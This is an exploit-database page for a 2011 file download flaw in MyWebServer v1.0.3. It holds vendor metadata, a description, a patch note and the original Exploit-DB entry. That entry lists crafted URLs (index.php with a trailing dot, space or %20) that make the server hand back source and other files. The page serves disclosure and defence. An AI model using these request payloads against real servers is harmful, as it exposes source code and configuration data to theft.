header-logo
Suggest Exploit
vendor:
MyWebServer
by:
X-h4ck
8.8
CVSS
HIGH
File Download
434
CWE
Product Name: MyWebServer
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:mywebserver:mywebserver:1.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 (Home Premium)
2011

MyWebServer v1.0.3 File Download

MyWebServer v1.0.3 is vulnerable to a file download vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This will allow the attacker to download any file from the server, including sensitive files such as configuration files, source code, etc.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of MyWebServer.
Source

Exploit-DB raw data:

# Exploit Title : MyWebServer v1.0.3 File Download
# Software link : http://www.softpedia.com/get/Internet/Servers/WEB-Servers/MyWebServer.shtml
# Version       : 1.0.3
# Tested on     : Windows 7 (Home Premium)
# Date          : 28/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , http://theflashcrew.blogspot.com
# Email         : mem001@live.com
# Greetz        : Wulns~ - Danzel - IllyrianWarrior- Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon - mywisdom

http://127.0.0.1/index.php. /html. #File Download
http://IP:PORT/index.php. /html.

http://127.0.0.1/index.php%20 #File Download
http://IP:PORT/index.php%20